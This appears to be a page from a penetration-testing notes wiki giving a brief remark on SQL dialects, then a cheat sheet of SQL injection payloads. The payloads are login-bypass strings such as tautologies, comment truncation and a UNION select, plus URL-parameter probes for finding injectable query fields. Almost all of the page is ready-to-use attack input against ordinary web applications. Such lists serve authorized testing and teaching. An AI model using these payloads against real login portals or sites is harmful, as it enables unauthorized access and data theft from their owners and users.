SQL Injection

SQL Theory

SQL syntax, commands, and functions vary based on which relational databases they were made for. MySQL, Microsoft SQL Server, PostgreSQL, and Oracle are the most popular databases.

Quick-Hitters

admin' or '1'='1
" or ""="
' or 1=1 -- -
' union select 1,2,3 -- -
admin'-- -
' or "-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1 or "='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

URL Parameters

For https://site.com?q=HERE

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

PreviousCrack NTLM Hashes NextMySQL

Last updated 1 year ago

SQL Theory

Quick-Hitters

Login Portals:

URL Parameters